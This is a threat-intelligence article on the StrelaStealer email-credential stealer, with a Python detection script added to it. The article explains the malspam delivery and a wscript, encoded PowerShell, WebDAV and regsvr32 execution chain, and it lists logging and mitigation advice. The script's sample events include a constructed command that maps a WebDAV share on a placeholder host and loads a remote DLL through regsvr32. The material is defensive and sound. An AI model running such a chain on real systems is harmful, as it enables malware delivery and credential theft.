New Infostealer Malware StrelaStealer Targets Email Credentials
Quick take - StrelaStealer is a newly discovered infostealer malware that targets login credentials from popular email clients and is primarily disseminated through malspam campaigns featuring ZIP files that execute a JavaScript payload, employing various obfuscation techniques to evade detection and complicate analysis.
Fast Facts
- StrelaStealer Overview: A newly identified infostealer malware targeting login credentials from popular email clients, primarily spread through malspam campaigns with ZIP file attachments.
- Infection Process: The malware’s initial payload is a JavaScript file executed via wscript.exe, which then runs a Base64-encoded PowerShell command to facilitate further malicious actions.
- Obfuscation Techniques: The JS file employs heavy obfuscation, including lengthy object names and random properties, complicating detection and analysis efforts.
- Detection Recommendations: Strong auditing practices, monitoring of Windows process creation, and alerts for suspicious file executions and PowerShell commands are essential for identifying StrelaStealer activities.
- Mitigation Strategies: Recommendations include blocking exploited file types, user training, secure email gateways, limiting user privileges, regular software updates, and employing Advanced Endpoint Detection and Response (EDR) solutions.
StrelaStealer: A New Infostealer Malware
Overview of StrelaStealer
StrelaStealer is a newly identified infostealer malware that targets login credentials from widely used email clients. The malware is primarily spread through malspam campaigns, which often include ZIP files. When these ZIP files are opened, users typically find a JavaScript (JS) file, which serves as the initial payload for the malware infection.
The JS file is executed by wscript.exe, the default handler for .js files on most Windows systems. During execution, the JS file spawns a child process and runs a Base64-encoded command via PowerShell. The decoded command first invokes timeout.exe, introducing a one-second delay, after which cmd.exe runs net.exe to map a network path to a WebDAV share. The command then uses regsvr32.exe to register and execute a DLL from that remote location. Because wscript.exe, PowerShell, net.exe and regsvr32.exe are all signed Windows binaries, nothing in this chain needs a dropped executable on disk, which is what makes it hard to separate from legitimate administrative activity.
Evasion Techniques and Detection Challenges
The payload’s structure is characterized by variable declarations and execution parts that are heavily obfuscated. The JS file includes lengthy object names and random properties, posing significant challenges for manual analysis. Adversaries use long junk variables with random values to further obscure the malware’s function. When deobfuscated, the extracted text from the payload reveals PowerShell instructions. These tactics are not unique to StrelaStealer but are commonly used by various forms of malware to evade detection.
Recognizing the evasion techniques used by StrelaStealer is crucial for timely identification and response. Strong auditing practices and relevant log generation are essential for detecting this kind of behavior: without command-line logging, the Base64 payload and the regsvr32 target path never reach the SIEM. Key log sources are Windows process creation with command-line auditing (Security Event ID 4688 with process command-line logging enabled) and Sysmon process creation events (Event ID 1), which also record the parent process. Alerts should cover script files executed by wscript or cscript, PowerShell launched by a script host, and PowerShell invocations carrying an encoded command or other potentially malicious cmdlets.
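The detection logic that the two passages above describe (the wscript to PowerShell to timeout/net use/regsvr32 chain, and the process-creation telemetry needed to see it) can be run over sample events. The block below is an added example written for this page, not code from the original article or from any vendor. Its events are constructed process-creation records with Sysmon-style field names, the decoded PowerShell text is a constructed approximation of the chain (argument forms and the `example.invalid` host are assumptions, not a real sample), and the rule thresholds are the editor's choices.

```python
"""Detect the StrelaStealer-style execution chain in process-creation events.

Added, illustrative example: not the malware and not a vendor rule set.
Events are constructed records with Sysmon Event ID 1 style fields; the
decoded PowerShell text is a constructed stand-in using a reserved host name.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional, Tuple

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
SCRIPT_FILE = re.compile(r"\.(?:jse|js|vbe|vbs|wsf)\b", re.IGNORECASE)
# -e / -ec / -en / -enc / -EncodedCommand; longest alternative first
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|en|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
REMOTE_PATH = re.compile(r"(?:\\\\[^\s\"']+|https?://\S+)", re.IGNORECASE)

# Constructed stand-in for the decoded PowerShell payload (assumption, not a real sample).
DECODED_PS = (
    "timeout 1; cmd /c net use \\\\example.invalid@SSL\\DavWWWRoot; "
    "regsvr32 /s /i \\\\example.invalid@SSL\\DavWWWRoot\\stage.dll"
)
# PowerShell -EncodedCommand takes Base64 of UTF-16LE text.
ENCODED_PS = base64.b64encode(DECODED_PS.encode("utf-16-le")).decode("ascii")

# Constructed sample events; the third is benign and must not alert.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\Downloads\invoice.js"'},
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + ENCODED_PS},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},
]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand text, or None if absent or malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def inspect_command_text(text: str) -> List[str]:
    """Flag the chain's building blocks in a (decoded) command line."""
    t = text.lower()
    findings = []
    if re.search(r"\btimeout(?:\.exe)?\s+\d+", t):
        findings.append("timeout delay before execution")
    if re.search(r"\bnet(?:\.exe)?\s+use\b", t) and any(k in t for k in ("davwwwroot", "@ssl", "webdav")):
        findings.append("net use to WebDAV share")
    if "regsvr32" in t and REMOTE_PATH.search(t):
        findings.append("regsvr32 loading remote DLL")
    return findings


def analyze_event(ev: Dict[str, str]) -> List[str]:
    """Apply the rules to one process-creation event; an empty list means no alert."""
    image, parent, cmd = basename(ev["Image"]), basename(ev["ParentImage"]), ev["CommandLine"]
    findings = []
    if image in SCRIPT_HOSTS and SCRIPT_FILE.search(cmd):
        findings.append("script host executing script file")
    if image in POWERSHELL and parent in SCRIPT_HOSTS:
        findings.append("powershell spawned by script host")
    if image in POWERSHELL:
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append("encoded powershell command")
            findings.extend(inspect_command_text(decoded))
    if image in {"regsvr32.exe", "cmd.exe", "net.exe"}:
        # The same building blocks may show up as their own child processes.
        findings.extend(inspect_command_text(cmd))
    return findings


def analyze_events(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Return (index, findings) for every event that triggered at least one rule."""
    hits = []
    for i, ev in enumerate(events):
        f = analyze_event(ev)
        if f:
            hits.append((i, f))
    return hits


if __name__ == "__main__":
    for idx, f in analyze_events(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(f)}")
```

The decoding step is the part worth keeping in any real rule: matching on the literal `-enc` flag only tells you a command was hidden, while decoding the UTF-16LE Base64 lets you apply the `net use` and `regsvr32` checks to what actually ran. The parent/child rule (PowerShell under wscript.exe) is what makes the signal survive if the attacker changes the payload contents.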
Mitigation Strategies
Monitoring system network connections is imperative to detect unauthorized access and file execution; in this chain the WebDAV mapping is the one step that has to touch the network. Any anomalous use of regsvr32.exe should be scrutinized, in particular a DLL path that points at a UNC share or URL rather than a local file. Recommendations for mitigating risks associated with StrelaStealer include blocking the file types the campaign abuses (script attachments such as .js inside ZIP archives), conducting regular user training, and configuring network policies to limit unauthorized outbound connections, including WebDAV to untrusted hosts.
Implementing a secure email gateway can significantly reduce risks from malspam emails. Limiting user privileges can prevent unauthorized software installation and execution. Regular updates of devices and software are necessary to patch vulnerabilities. Employing Advanced Endpoint Detection and Response (EDR) solutions can help identify suspicious activities related to script execution and binary downloads. Monitoring web browsing behavior is beneficial in preventing potential malware downloads from harmful sites.
To support effective threat analysis and detection, comprehensive logging and monitoring practices should be maintained. A recommended log retention policy of at least six months ensures sufficient data is available for incident investigation.
Original Source: Read the Full Article Here